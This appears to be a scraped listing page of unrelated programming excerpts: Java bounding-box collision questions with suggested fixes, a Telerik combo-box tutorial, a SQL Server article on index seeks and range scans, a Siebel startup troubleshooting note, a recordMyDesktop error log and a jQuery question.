    Oracle WebCenter partners Fishbowl Solutions, Fujitsu, Keste, Mythics, Redstone Content Solutions, TEAM Informatics, and TekStream invite Oracle WebCenter customers to a private cocktail reception at one of San Francisco's finest hotels. Please join us and fellow Oracle WebCenter customers for hors d'oeuvres and cocktails at this exclusive reception. Don't miss this opportunity to meet and talk with executives from Oracle WebCenter product management and product marketing, and premier Oracle WebCenter partners. We look forward to seeing you! RSVP today.


  • Point inside Oriented Bounding Box?

    - by Milo
    I have an OBB2D class based on SAT. This is my point in OBB method: public boolean pointInside(float x, float y) { float newy = (float) (Math.sin(angle) * (y - center.y) + Math.cos(angle) * (x - center.x)); float newx = (float) (Math.cos(angle) * (x - center.x) - Math.sin(angle) * (y - center.y)); return (newy > center.y - (getHeight() / 2)) && (newy < center.y + (getHeight() / 2)) && (newx > center.x - (getWidth() / 2)) && (newx < center.x + (getWidth() / 2)); } public boolean pointInside(Vector2D v) { return pointInside(v.x,v.y); } Here is the rest of the class; the parts that pertain: public class OBB2D { private Vector2D projVec = new Vector2D(); private static Vector2D projAVec = new Vector2D(); private static Vector2D projBVec = new Vector2D(); private static Vector2D tempNormal = new Vector2D(); private Vector2D deltaVec = new Vector2D(); private ArrayList<Vector2D> collisionPoints = new ArrayList<Vector2D>(); // Corners of the box, where 0 is the lower left. private Vector2D corner[] = new Vector2D[4]; private Vector2D center = new Vector2D(); private Vector2D extents = new Vector2D(); private RectF boundingRect = new RectF(); private float angle; //Two edges of the box extended away from corner[0]. private Vector2D axis[] = new Vector2D[2]; private double origin[] = new double[2]; public OBB2D(float centerx, float centery, float w, float h, float angle) { for(int i = 0; i < corner.length; ++i) { corner[i] = new Vector2D(); } for(int i = 0; i < axis.length; ++i) { axis[i] = new Vector2D(); } set(centerx,centery,w,h,angle); } public OBB2D(float left, float top, float width, float height) { for(int i = 0; i < corner.length; ++i) { corner[i] = new Vector2D(); } for(int i = 0; i < axis.length; ++i) { axis[i] = new Vector2D(); } set(left + (width / 2), top + (height / 2),width,height,0.0f); } public void set(float centerx,float centery,float w, float h,float angle) { float vxx = (float)Math.cos(angle); float vxy = (float)Math.sin(angle); float vyx = (float)-Math.sin(angle); float vyy = (float)Math.cos(angle); vxx *= w / 2; vxy *= (w / 2); vyx *= (h / 2); vyy *= (h / 2); corner[0].x = centerx - vxx - vyx; corner[0].y = centery - vxy - vyy; corner[1].x = centerx + vxx - vyx; corner[1].y = centery + vxy - vyy; corner[2].x = centerx + vxx + vyx; corner[2].y = centery + vxy + vyy; corner[3].x = centerx - vxx + vyx; corner[3].y = centery - vxy + vyy; this.center.x = centerx; this.center.y = centery; this.angle = angle; computeAxes(); extents.x = w / 2; extents.y = h / 2; computeBoundingRect(); } //Updates the axes after the corners move. Assumes the //corners actually form a rectangle. private void computeAxes() { axis[0].x = corner[1].x - corner[0].x; axis[0].y = corner[1].y - corner[0].y; axis[1].x = corner[3].x - corner[0].x; axis[1].y = corner[3].y - corner[0].y; // Make the length of each axis 1/edge length so we know any // dot product must be less than 1 to fall within the edge. 
for (int a = 0; a < axis.length; ++a) { float l = axis[a].length(); float ll = l * l; axis[a].x = axis[a].x / ll; axis[a].y = axis[a].y / ll; origin[a] = corner[0].dot(axis[a]); } } public void computeBoundingRect() { boundingRect.left = JMath.min(JMath.min(corner[0].x, corner[3].x), JMath.min(corner[1].x, corner[2].x)); boundingRect.top = JMath.min(JMath.min(corner[0].y, corner[1].y),JMath.min(corner[2].y, corner[3].y)); boundingRect.right = JMath.max(JMath.max(corner[1].x, corner[2].x), JMath.max(corner[0].x, corner[3].x)); boundingRect.bottom = JMath.max(JMath.max(corner[2].y, corner[3].y),JMath.max(corner[0].y, corner[1].y)); } public void set(RectF rect) { set(rect.centerX(),rect.centerY(),rect.width(),rect.height(),0.0f); } // Returns true if other overlaps one dimension of this. private boolean overlaps1Way(OBB2D other) { for (int a = 0; a < axis.length; ++a) { double t = other.corner[0].dot(axis[a]); // Find the extent of box 2 on axis a double tMin = t; double tMax = t; for (int c = 1; c < corner.length; ++c) { t = other.corner[c].dot(axis[a]); if (t < tMin) { tMin = t; } else if (t > tMax) { tMax = t; } } // We have to subtract off the origin // See if [tMin, tMax] intersects [0, 1] if ((tMin > 1 + origin[a]) || (tMax < origin[a])) { // There was no intersection along this dimension; // the boxes cannot possibly overlap. return false; } } // There was no dimension along which there is no intersection. // Therefore the boxes overlap. return true; } public void moveTo(float centerx, float centery) { float cx,cy; cx = center.x; cy = center.y; deltaVec.x = centerx - cx; deltaVec.y = centery - cy; for (int c = 0; c < 4; ++c) { corner[c].x += deltaVec.x; corner[c].y += deltaVec.y; } boundingRect.left += deltaVec.x; boundingRect.top += deltaVec.y; boundingRect.right += deltaVec.x; boundingRect.bottom += deltaVec.y; this.center.x = centerx; this.center.y = centery; computeAxes(); } // Returns true if the intersection of the boxes is non-empty. 
public boolean overlaps(OBB2D other) { if(right() < other.left()) { return false; } if(bottom() < other.top()) { return false; } if(left() > other.right()) { return false; } if(top() > other.bottom()) { return false; } if(other.getAngle() == 0.0f && getAngle() == 0.0f) { return true; } return overlaps1Way(other) && other.overlaps1Way(this); } public Vector2D getCenter() { return center; } public float getWidth() { return extents.x * 2; } public float getHeight() { return extents.y * 2; } public void setAngle(float angle) { set(center.x,center.y,getWidth(),getHeight(),angle); } public float getAngle() { return angle; } public void setSize(float w,float h) { set(center.x,center.y,w,h,angle); } public float left() { return boundingRect.left; } public float right() { return boundingRect.right; } public float bottom() { return boundingRect.bottom; } public float top() { return boundingRect.top; } public RectF getBoundingRect() { return boundingRect; } public boolean overlaps(float left, float top, float right, float bottom) { if(right() < left) { return false; } if(bottom() < top) { return false; } if(left() > right) { return false; } if(top() > bottom) { return false; } return true; } public static float distance(float ax, float ay,float bx, float by) { if (ax < bx) return bx - ay; else return ax - by; } public Vector2D project(float ax, float ay) { projVec.x = Float.MAX_VALUE; projVec.y = Float.MIN_VALUE; for (int i = 0; i < corner.length; ++i) { float dot = Vector2D.dot(corner[i].x,corner[i].y,ax,ay); projVec.x = JMath.min(dot, projVec.x); projVec.y = JMath.max(dot, projVec.y); } return projVec; } public Vector2D getCorner(int c) { return corner[c]; } public int getNumCorners() { return corner.length; } public boolean pointInside(float x, float y) { float newy = (float) (Math.sin(angle) * (y - center.y) + Math.cos(angle) * (x - center.x)); float newx = (float) (Math.cos(angle) * (x - center.x) - Math.sin(angle) * (y - center.y)); return (newy > center.y - (getHeight() / 2)) && (newy < center.y + (getHeight() / 2)) && (newx > center.x - (getWidth() / 2)) && (newx < center.x + (getWidth() / 2)); } public boolean pointInside(Vector2D v) { return pointInside(v.x,v.y); } public ArrayList<Vector2D> getCollsionPoints(OBB2D b) { collisionPoints.clear(); for(int i = 0; i < corner.length; ++i) { if(b.pointInside(corner[i])) { collisionPoints.add(corner[i]); } } for(int i = 0; i < b.corner.length; ++i) { if(pointInside(b.corner[i])) { collisionPoints.add(b.corner[i]); } } return collisionPoints; } }; What could be wrong? When I getCollisionPoints for 2 OBBs I know are penetrating, it returns no points. Thanks
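
    One likely culprit, for reference: the rotated newx/newy values are offsets relative to the box center, yet they are compared against bounds built from center.x and center.y, which double-counts the center. A corrected sketch rotates by -angle into the box's local frame and tests against the half-extents around zero:

        public boolean pointInside(float x, float y) {
            // Rotate the world-space offset into the box's local frame (inverse rotation).
            float dx = x - center.x;
            float dy = y - center.y;
            float localX = (float)( Math.cos(angle) * dx + Math.sin(angle) * dy);
            float localY = (float)(-Math.sin(angle) * dx + Math.cos(angle) * dy);
            // Compare against the half-extents around the origin, not around center.
            return Math.abs(localX) < getWidth() / 2 && Math.abs(localY) < getHeight() / 2;
        }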


  • How To: Filter as you type RadGridView inside RadComboBox for WPF and Silverlight

    I've made a small example of how to place a RadGridView inside an editable RadComboBox and filter the grid items as you type in the combo. The easiest way to place any UI element in a RadComboBox is to create a single RadComboBoxItem and define the desired Template:

        <telerikInput:RadComboBox Text="{Binding Text, Mode=TwoWay}" IsEditable="True" Height="25" Width="200">
          <telerikInput:RadComboBox.Items>
            <telerikInput:RadComboBoxItem>
              <telerikInput:RadComboBoxItem.Template>
                <ControlTemplate>
                  <telerikGrid:RadGridView x:Name="RadGridView1" ShowGroupPanel="False" CanUserFreezeColumns="False"
                                           RowIndicatorVisibility="Collapsed" IsReadOnly="True" IsFilteringAllowed="False"
                                           ItemsSource="{Binding Items}" Width="200" Height="150"
                                           SelectedItem="{Binding SelectedItem, Mode=TwoWay}">
                  </telerikGrid:RadGridView>
                </ControlTemplate>
              </telerikInput:RadComboBoxItem.Template>
            </telerikInput:RadComboBoxItem>
          </telerikInput:RadComboBox.Items>
        </telerikInput:RadComboBox>

    Now you can create a small view model and bind ...


  • Point of contact of 2 OBBs?

    - by Milo
    I'm working on the physics for my GTA2-like game so I can learn more about game physics. The collision detection and resolution are working great. I'm now just unsure how to compute the point of contact when I hit a wall. Here is my OBB class: public class OBB2D { private Vector2D projVec = new Vector2D(); private static Vector2D projAVec = new Vector2D(); private static Vector2D projBVec = new Vector2D(); private static Vector2D tempNormal = new Vector2D(); private Vector2D deltaVec = new Vector2D(); // Corners of the box, where 0 is the lower left. private Vector2D corner[] = new Vector2D[4]; private Vector2D center = new Vector2D(); private Vector2D extents = new Vector2D(); private RectF boundingRect = new RectF(); private float angle; //Two edges of the box extended away from corner[0]. private Vector2D axis[] = new Vector2D[2]; private double origin[] = new double[2]; public OBB2D(float centerx, float centery, float w, float h, float angle) { for(int i = 0; i < corner.length; ++i) { corner[i] = new Vector2D(); } for(int i = 0; i < axis.length; ++i) { axis[i] = new Vector2D(); } set(centerx,centery,w,h,angle); } public OBB2D(float left, float top, float width, float height) { for(int i = 0; i < corner.length; ++i) { corner[i] = new Vector2D(); } for(int i = 0; i < axis.length; ++i) { axis[i] = new Vector2D(); } set(left + (width / 2), top + (height / 2),width,height,0.0f); } public void set(float centerx,float centery,float w, float h,float angle) { float vxx = (float)Math.cos(angle); float vxy = (float)Math.sin(angle); float vyx = (float)-Math.sin(angle); float vyy = (float)Math.cos(angle); vxx *= w / 2; vxy *= (w / 2); vyx *= (h / 2); vyy *= (h / 2); corner[0].x = centerx - vxx - vyx; corner[0].y = centery - vxy - vyy; corner[1].x = centerx + vxx - vyx; corner[1].y = centery + vxy - vyy; corner[2].x = centerx + vxx + vyx; corner[2].y = centery + vxy + vyy; corner[3].x = centerx - vxx + vyx; corner[3].y = centery - vxy + vyy; this.center.x = centerx; this.center.y = centery; this.angle = angle; computeAxes(); extents.x = w / 2; extents.y = h / 2; computeBoundingRect(); } //Updates the axes after the corners move. Assumes the //corners actually form a rectangle. private void computeAxes() { axis[0].x = corner[1].x - corner[0].x; axis[0].y = corner[1].y - corner[0].y; axis[1].x = corner[3].x - corner[0].x; axis[1].y = corner[3].y - corner[0].y; // Make the length of each axis 1/edge length so we know any // dot product must be less than 1 to fall within the edge. for (int a = 0; a < axis.length; ++a) { float l = axis[a].length(); float ll = l * l; axis[a].x = axis[a].x / ll; axis[a].y = axis[a].y / ll; origin[a] = corner[0].dot(axis[a]); } } public void computeBoundingRect() { boundingRect.left = JMath.min(JMath.min(corner[0].x, corner[3].x), JMath.min(corner[1].x, corner[2].x)); boundingRect.top = JMath.min(JMath.min(corner[0].y, corner[1].y),JMath.min(corner[2].y, corner[3].y)); boundingRect.right = JMath.max(JMath.max(corner[1].x, corner[2].x), JMath.max(corner[0].x, corner[3].x)); boundingRect.bottom = JMath.max(JMath.max(corner[2].y, corner[3].y),JMath.max(corner[0].y, corner[1].y)); } public void set(RectF rect) { set(rect.centerX(),rect.centerY(),rect.width(),rect.height(),0.0f); } // Returns true if other overlaps one dimension of this. 
private boolean overlaps1Way(OBB2D other) { for (int a = 0; a < axis.length; ++a) { double t = other.corner[0].dot(axis[a]); // Find the extent of box 2 on axis a double tMin = t; double tMax = t; for (int c = 1; c < corner.length; ++c) { t = other.corner[c].dot(axis[a]); if (t < tMin) { tMin = t; } else if (t > tMax) { tMax = t; } } // We have to subtract off the origin // See if [tMin, tMax] intersects [0, 1] if ((tMin > 1 + origin[a]) || (tMax < origin[a])) { // There was no intersection along this dimension; // the boxes cannot possibly overlap. return false; } } // There was no dimension along which there is no intersection. // Therefore the boxes overlap. return true; } public void moveTo(float centerx, float centery) { float cx,cy; cx = center.x; cy = center.y; deltaVec.x = centerx - cx; deltaVec.y = centery - cy; for (int c = 0; c < 4; ++c) { corner[c].x += deltaVec.x; corner[c].y += deltaVec.y; } boundingRect.left += deltaVec.x; boundingRect.top += deltaVec.y; boundingRect.right += deltaVec.x; boundingRect.bottom += deltaVec.y; this.center.x = centerx; this.center.y = centery; computeAxes(); } // Returns true if the intersection of the boxes is non-empty. public boolean overlaps(OBB2D other) { if(right() < other.left()) { return false; } if(bottom() < other.top()) { return false; } if(left() > other.right()) { return false; } if(top() > other.bottom()) { return false; } if(other.getAngle() == 0.0f && getAngle() == 0.0f) { return true; } return overlaps1Way(other) && other.overlaps1Way(this); } public Vector2D getCenter() { return center; } public float getWidth() { return extents.x * 2; } public float getHeight() { return extents.y * 2; } public void setAngle(float angle) { set(center.x,center.y,getWidth(),getHeight(),angle); } public float getAngle() { return angle; } public void setSize(float w,float h) { set(center.x,center.y,w,h,angle); } public float left() { return boundingRect.left; } public float right() { return boundingRect.right; } public float bottom() { return boundingRect.bottom; } public float top() { return boundingRect.top; } public RectF getBoundingRect() { return boundingRect; } public boolean overlaps(float left, float top, float right, float bottom) { if(right() < left) { return false; } if(bottom() < top) { return false; } if(left() > right) { return false; } if(top() > bottom) { return false; } return true; } public static float distance(float ax, float ay,float bx, float by) { if (ax < bx) return bx - ay; else return ax - by; } public Vector2D project(float ax, float ay) { projVec.x = Float.MAX_VALUE; projVec.y = Float.MIN_VALUE; for (int i = 0; i < corner.length; ++i) { float dot = Vector2D.dot(corner[i].x,corner[i].y,ax,ay); projVec.x = JMath.min(dot, projVec.x); projVec.y = JMath.max(dot, projVec.y); } return projVec; } public Vector2D getCorner(int c) { return corner[c]; } public int getNumCorners() { return corner.length; } public static float collisionResponse(OBB2D a, OBB2D b, Vector2D outNormal) { float depth = Float.MAX_VALUE; for (int i = 0; i < a.getNumCorners() + b.getNumCorners(); ++i) { Vector2D edgeA; Vector2D edgeB; if(i >= a.getNumCorners()) { edgeA = b.getCorner((i + b.getNumCorners() - 1) % b.getNumCorners()); edgeB = b.getCorner(i % b.getNumCorners()); } else { edgeA = a.getCorner((i + a.getNumCorners() - 1) % a.getNumCorners()); edgeB = a.getCorner(i % a.getNumCorners()); } tempNormal.x = edgeB.x -edgeA.x; tempNormal.y = edgeB.y - edgeA.y; tempNormal.normalize(); projAVec.equals(a.project(tempNormal.x,tempNormal.y)); 
projBVec.equals(b.project(tempNormal.x,tempNormal.y)); float distance = OBB2D.distance(projAVec.x, projAVec.y,projBVec.x,projBVec.y); if (distance > 0.0f) { return 0.0f; } else { float d = Math.abs(distance); if (d < depth) { depth = d; outNormal.equals(tempNormal); } } } float dx,dy; dx = b.getCenter().x - a.getCenter().x; dy = b.getCenter().y - a.getCenter().y; float dot = Vector2D.dot(dx,dy,outNormal.x,outNormal.y); if(dot > 0) { outNormal.x = -outNormal.x; outNormal.y = -outNormal.y; } return depth; } public Vector2D getMoveDeltaVec() { return deltaVec; } }; Thanks!
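
    For the contact point itself, one common approximation (a sketch; it reuses the corner-containment idea and assumes a working pointInside like the one discussed in the previous question) is to average all corners of each box that lie inside the other, falling back to the midpoint of the centers when no corner penetrates:

        // Approximate the contact point as the mean of all penetrating corners.
        public static Vector2D contactPoint(OBB2D a, OBB2D b) {
            float sx = 0, sy = 0;
            int n = 0;
            for (int i = 0; i < a.getNumCorners(); ++i) {
                Vector2D c = a.getCorner(i);
                if (b.pointInside(c.x, c.y)) { sx += c.x; sy += c.y; ++n; }
            }
            for (int i = 0; i < b.getNumCorners(); ++i) {
                Vector2D c = b.getCorner(i);
                if (a.pointInside(c.x, c.y)) { sx += c.x; sy += c.y; ++n; }
            }
            Vector2D contact = new Vector2D();
            if (n == 0) { // deep or edge-edge overlap with no corner inside
                contact.x = (a.getCenter().x + b.getCenter().x) * 0.5f;
                contact.y = (a.getCenter().y + b.getCenter().y) * 0.5f;
            } else {
                contact.x = sx / n;
                contact.y = sy / n;
            }
            return contact;
        }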


  • So…is it a Seek or a Scan?

    - by Paul White
    You’re probably most familiar with the terms ‘Seek’ and ‘Scan’ from the graphical plans produced by SQL Server Management Studio (SSMS).  The image to the left shows the most common ones, with the three types of scan at the top, followed by four types of seek.  You might look to the SSMS tool-tip descriptions to explain the differences between them: Not hugely helpful are they?  Both mention scans and ranges (nothing about seeks) and the Index Seek description implies that it will not scan the index entirely (which isn’t necessarily true). Recall also yesterday’s post where we saw two Clustered Index Seek operations doing very different things.  The first Seek performed 63 single-row seeking operations; and the second performed a ‘Range Scan’ (more on those later in this post).  I hope you agree that those were two very different operations, and perhaps you are wondering why there aren’t different graphical plan icons for Range Scans and Seeks?  I have often wondered about that, and the first person to mention it after yesterday’s post was Erin Stellato (twitter | blog): Before we go on to make sense of all this, let’s look at another example of how SQL Server confusingly mixes the terms ‘Scan’ and ‘Seek’ in different contexts.  The diagram below shows a very simple heap table with two columns, one of which is the non-clustered Primary Key, and the other has a non-unique non-clustered index defined on it.  The right hand side of the diagram shows a simple query, it’s associated query plan, and a couple of extracts from the SSMS tool-tip and Properties windows. Notice the ‘scan direction’ entry in the Properties window snippet.  Is this a seek or a scan?  The different references to Scans and Seeks are even more pronounced in the XML plan output that the graphical plan is based on.  This fragment is what lies behind the single Index Seek icon shown above: You’ll find the same confusing references to Seeks and Scans throughout the product and its documentation. Making Sense of Seeks Let’s forget all about scans for a moment, and think purely about seeks.  Loosely speaking, a seek is the process of navigating an index B-tree to find a particular index record, most often at the leaf level.  A seek starts at the root and navigates down through the levels of the index to find the point of interest: Singleton Lookups The simplest sort of seek predicate performs this traversal to find (at most) a single record.  This is the case when we search for a single value using a unique index and an equality predicate.  It should be readily apparent that this type of search will either find one record, or none at all.  This operation is known as a singleton lookup.  Given the example table from before, the following query is an example of a singleton lookup seek: Sadly, there’s nothing in the graphical plan or XML output to show that this is a singleton lookup – you have to infer it from the fact that this is a single-value equality seek on a unique index.  The other common examples of a singleton lookup are bookmark lookups – both the RID and Key Lookup forms are singleton lookups (an RID lookup finds a single record in a heap from the unique row locator, and a Key Lookup does much the same thing on a clustered table).  If you happen to run your query with STATISTICS IO ON, you will notice that ‘Scan Count’ is always zero for a singleton lookup. Range Scans The other type of seek predicate is a ‘seek plus range scan’, which I will refer to simply as a range scan.  
    The seek operation makes an initial descent into the index structure to find the first leaf row that qualifies, and then performs a range scan (either backwards or forwards in the index) until it reaches the end of the scan range. The ability of a range scan to proceed in either direction comes about because index pages at the same level are connected by a doubly-linked list – each page has a pointer to the previous page (in logical key order) as well as a pointer to the following page.  The doubly-linked list is represented by the green and red dotted arrows in the index diagram presented earlier.  One subtle (but important) point is that the notion of a ‘forward’ or ‘backward’ scan applies to the logical key order defined when the index was built.  In the present case, the non-clustered primary key index was created as follows:

    CREATE TABLE dbo.Example
    (
        key_col INTEGER NOT NULL,
        data INTEGER NOT NULL,
        CONSTRAINT [PK dbo.Example key_col]
            PRIMARY KEY NONCLUSTERED (key_col ASC)
    );

    Notice that the primary key index specifies an ascending sort order for the single key column.  This means that a forward scan of the index will retrieve keys in ascending order, while a backward scan would retrieve keys in descending key order.  If the index had been created instead on key_col DESC, a forward scan would retrieve keys in descending order, and a backward scan would return keys in ascending order.

    A range scan seek predicate may have a Start condition, an End condition, or both.  Where one is missing, the scan starts (or ends) at one extreme end of the index, depending on the scan direction.  Some examples might help clarify that: the following diagram shows four queries, each of which performs a single seek against a column holding every integer from 1 to 100 inclusive.  The results from each query are shown in the blue columns, and relevant attributes from the Properties window appear on the right:

    Query 1 specifies that all key_col values less than 5 should be returned in ascending order.  The query plan achieves this by seeking to the start of the index leaf (there is no explicit starting value) and scanning forward until the End condition (key_col < 5) is no longer satisfied (SQL Server knows it can stop looking as soon as it finds a key_col value that isn’t less than 5 because all later index entries are guaranteed to sort higher).

    Query 2 asks for key_col values greater than 95, in descending order.  SQL Server returns these results by seeking to the end of the index, and scanning backwards (in descending key order) until it comes across a row that isn’t greater than 95.  Sharp-eyed readers may notice that the end-of-scan condition is shown as a Start range value.  This is a bug in the XML show plan which bubbles up to the Properties window – when a backward scan is performed, the roles of the Start and End values are reversed, but the plan does not reflect that.  Oh well.

    Query 3 looks for key_col values that are greater than or equal to 10, and less than 15, in ascending order.  This time, SQL Server seeks to the first index record that matches the Start condition (key_col >= 10) and then scans forward through the leaf pages until the End condition (key_col < 15) is no longer met.

    Query 4 performs much the same sort of operation as Query 3, but requests the output in descending order.
    Again, we have to mentally reverse the Start and End conditions because of the bug, but otherwise the process is the same as always: SQL Server finds the highest-sorting record that meets the condition ‘key_col < 25’ and scans backward until ‘key_col >= 20’ is no longer true.

    One final point to note: seek operations always have the Ordered: True attribute.  This means that the operator always produces rows in a sorted order, either ascending or descending depending on how the index was defined, and whether the scan part of the operation is forward or backward.  You cannot rely on this sort order in your queries of course (you must always specify an ORDER BY clause if order is important) but SQL Server can make use of the sort order internally.  In the four queries above, the query optimizer was able to avoid an explicit Sort operator to honour the ORDER BY clause, for example.

    Multiple Seek Predicates

    As we saw yesterday, a single index seek plan operator can contain one or more seek predicates.  These seek predicates can either be all singleton seeks or all range scans – SQL Server does not mix them.  For example, you might expect the following query to contain two seek predicates, a singleton seek to find the single record in the unique index where key_col = 10, and a range scan to find the key_col values between 15 and 20:

    SELECT key_col
    FROM dbo.Example
    WHERE key_col = 10
    OR key_col BETWEEN 15 AND 20
    ORDER BY key_col ASC;

    In fact, SQL Server transforms the singleton seek (key_col = 10) to the equivalent range scan, Start:[key_col >= 10], End:[key_col <= 10].  This allows both range scans to be evaluated by a single seek operator.  To be clear, this query results in two range scans: one from 10 to 10, and one from 15 to 20.

    Final Thoughts

    That’s it for today – tomorrow we’ll look at monitoring singleton lookups and range scans, and I’ll show you a seek on a heap table. Yes, a seek.  On a heap.  Not an index! If you would like to run the queries in this post for yourself, there’s a script below.  Thanks for reading!
    IF OBJECT_ID(N'dbo.Example', N'U') IS NOT NULL
    BEGIN
        DROP TABLE dbo.Example;
    END;

    -- Test table is a heap
    -- Non-clustered primary key on 'key_col'
    CREATE TABLE dbo.Example
    (
        key_col INTEGER NOT NULL,
        data INTEGER NOT NULL,
        CONSTRAINT [PK dbo.Example key_col]
            PRIMARY KEY NONCLUSTERED (key_col)
    );

    -- Non-unique non-clustered index on the 'data' column
    CREATE NONCLUSTERED INDEX [IX dbo.Example data]
    ON dbo.Example (data);

    -- Add 100 rows
    INSERT dbo.Example WITH (TABLOCKX)
        (key_col, data)
    SELECT key_col = V.number,
           data = V.number
    FROM master.dbo.spt_values AS V
    WHERE V.[type] = N'P'
    AND V.number BETWEEN 1 AND 100;

    -- ================
    -- Singleton lookup
    -- ================

    -- Single value equality seek in a unique index
    -- Scan count = 0 when STATISTICS IO is ON
    -- Check the XML SHOWPLAN
    SELECT E.key_col
    FROM dbo.Example AS E
    WHERE E.key_col = 32;

    -- ===========
    -- Range Scans
    -- ===========

    -- Query 1
    SELECT E.key_col FROM dbo.Example AS E WHERE E.key_col <= 5 ORDER BY E.key_col ASC;

    -- Query 2
    SELECT E.key_col FROM dbo.Example AS E WHERE E.key_col > 95 ORDER BY E.key_col DESC;

    -- Query 3
    SELECT E.key_col FROM dbo.Example AS E WHERE E.key_col >= 10 AND E.key_col < 15 ORDER BY E.key_col ASC;

    -- Query 4
    SELECT E.key_col FROM dbo.Example AS E WHERE E.key_col >= 20 AND E.key_col < 25 ORDER BY E.key_col DESC;

    -- Final query (singleton + range = 2 range scans)
    SELECT E.key_col FROM dbo.Example AS E WHERE E.key_col = 10 OR E.key_col BETWEEN 15 AND 20 ORDER BY E.key_col ASC;

    -- === TIDY UP ===
    DROP TABLE dbo.Example;

    © 2011 Paul White email: [email protected] twitter: @SQL_Kiwi
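    A quick way to see the ‘Scan Count’ behaviour described above is to run one singleton lookup and one range scan against the sample table with STATISTICS IO enabled. The snippet below is my addition rather than part of the original script, but it reuses the queries the post already defines; the expected counts (0 for the singleton lookup, 1 for the single range scan) follow from the discussion above.

    -- Sketch: observing Scan Count for a singleton lookup vs a range scan.
    -- Assumes dbo.Example has been created and populated by the script above.
    SET STATISTICS IO ON;

    -- Singleton lookup (unique index, equality predicate): expect Scan Count 0
    SELECT E.key_col FROM dbo.Example AS E WHERE E.key_col = 32;

    -- Seek plus range scan: expect Scan Count 1
    SELECT E.key_col FROM dbo.Example AS E WHERE E.key_col <= 5 ORDER BY E.key_col ASC;

    SET STATISTICS IO OFF;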

    Read the article

  • Siebel Troubleshooting : An ODBC error occurred; SBL-GEN-03006: Error calling function: DICFindTable m_pReqTbl

    - by Giri Mandalika
    Symptom: A newly installed Siebel application server fails to start despite successful ODBC connectivity to the database. The SRProc process logs ODBC error messages similar to the following:

    Message: GEN-13, Additional Message: dict-ERR-1109: Unable to read value from export file (Data length (32) Column definition (3)).
    Message: GEN-13, Additional Message: dict-ERR-1107: Unable to read row 0 from export file (UTLDataValRead pBuf, col 4 ).
    GenericLog GenericError 1 0002157.. 11-11-18 13:28
    Message: Generated SQL statement:, Additional Message: SQLFetch: SELECT RDOBJ.DOCK_ID, RDOBJ.RELATED_DOCK_ID, RDOBJ.SQL_STATEMENT, RDOBJ.CHECK_VISIBILITY, 'N', RDOBJ.COMMENTS, RDOBJ.ACTIVE, RDOBJ.SEQUENCE, RDOBJ.VIS_STRENGTH, RDOBJ.REL_VIS_STRENGTH, RDOBJ.VIS_EVT_COLS FROM ORAPERF.S_DOCK_REL_DOBJ RDOBJ, ORAPERF.S_DOCK_OBJECT DOBJ WHERE RDOBJ.REPOSITORY_ID = (SELECT ROW_ID FROM ORAPERF.S_REPOSITORY WHERE NAME = ?) AND DOBJ.ROW_ID = RDOBJ.DOCK_ID AND (DOBJ.INACTIVE_FLG = 'N' OR DOBJ.INACTIVE_FLG IS NULL) AND (RDOBJ.INACTIVE_FLG = 'N' OR RDOBJ.INACTIVE_FLG IS NULL)
    Message: Error: An ODBC error occurred, Additional Message: Function: DICGetRDObjects; ODBC operation: SQLFetch
    Message: GEN-13, Additional Message: dict-ERR-1109: Unable to read value from export file (UTLCompressFRead (fseek)).
    Message: GEN-13, Additional Message: dict-ERR-1107: Unable to read row 0 from export file (UTLDataValRead pBuf, col 0 ).
    Message: GEN-10, Additional Message: Calling Function: DICLoadDObjectInfo; Called Function: Calling DICGetRDObjects
    Message: GEN-10, Additional Message: Calling Function: DICLoadDict; Called Function: DICLoadDObjectInfo
    GenericError (srpdb.cpp (860) err=3006 sys=2) SBL-GEN-03006: Error calling function: DICFindTable m_pReqTbl
    (srpsmech.cpp (74) err=3006 sys=0) SBL-GEN-03006: Error calling function: DICFindTable m_pReqTbl
    (srpmtsrv.cpp (107) err=3006 sys=0) SBL-GEN-03006: Error calling function: DICFindTable m_pReqTbl
    (smimtsrv.cpp (1203) err=3006 sys=0) SBL-GEN-03006: Error calling function: DICFindTable m_pReqTbl
    SmiLayerLog Error Terminate process due to unrecoverable error: 3006. (Main Thread)

    An inconsistent or corrupted dictionary file "diccache.dat" is the likely cause.

    Solution:
    1. Stop the application server and manually kill the remaining Siebel application-specific processes, e.g.:
       stop_server all
       pkill siebmtsh
       pkill siebproc
       ..
    2. Remove the $SIEBEL_HOME/bin/diccache.dat file. It will be re-generated during application server startup.
    3. Start the application server:
       start_server all

    Read the article

  • recordMyDesktop stopped working after upgrade

    - by anfeo
    Hi, I've done the upgrade to Ubuntu 10.10 from Ubuntu 10.04, and recordMyDesktop doesn't work now. If I start it from the command line it seems to work, but the interface doesn't start and I get this error:

    Initial recording window is set to: X:0 Y:0 Width:1680 Height:945
    Adjusted recording window is set to: X:0 Y:0 Width:1680 Height:944
    Your window manager appears to be Metacity
    Initializing...
    Buffer size adjusted to 4096 from 4096 frames.
    Opened PCM device default
    Recording on device default is set to: 1 channels at 22050Hz
    X Error: BadAccess (attempt to access private resource denied)
    Bad Access on XGrabKey. Shortcut already assigned.
    X Error: BadAccess (attempt to access private resource denied)
    Bad Access on XGrabKey. Shortcut already assigned.
    X Error: BadAccess (attempt to access private resource denied)
    Bad Access on XGrabKey. Shortcut already assigned.
    X Error: BadAccess (attempt to access private resource denied)
    Bad Access on XGrabKey. Shortcut already assigned.
    Capturing!
    X Error: BadAccess (attempt to access private resource denied)
    Bad Access on XGrabKey. Shortcut already assigned.
    X Error: BadAccess (attempt to access private resource denied)
    Bad Access on XGrabKey. Shortcut already assigned.
    X Error: BadAccess (attempt to access private resource denied)
    Bad Access on XGrabKey. Shortcut already assigned.
    X Error: BadAccess (attempt to access private resource denied)
    Bad Access on XGrabKey. Shortcut already assigned.

    Read the article

  • Replace Javascript click event with timed event?

    - by Rik
    Hi, I've found some JavaScript code that layers photos on top of each other when you click on them. Rather than having to click, I'd like the function to automatically run every 5 seconds. How can I change this event to a timed one:

    $('a#nextImage, #image img').click(function(event){

    Full code below. Thanks

    <script type="text/javascript">
    $(document).ready(function(){
        $('#description').css({'display':'block'});
        $('#image img').hover(function() {
            $(this).addClass('hover');
        }, function() {
            $(this).removeClass('hover');
        });
        $('a#nextImage, #image img').click(function(event){
            event.preventDefault();
            $('#description p:first-child').css({'visibility':'hidden'});
            if($('#image img.current').next().length){
                $('#image img.current').removeClass('current').next().fadeIn('normal').addClass('current').css({'position':'absolute'});
            }else{
                $('#image img').removeClass('current').css({'display':'none'});
                $('#image img:first-child').fadeIn('normal').addClass('current').css({'position':'absolute'});
            }
            if($('#image img.current').width()>=($('#page').width()-100)){
                xPos=170;
            }else{
                do{
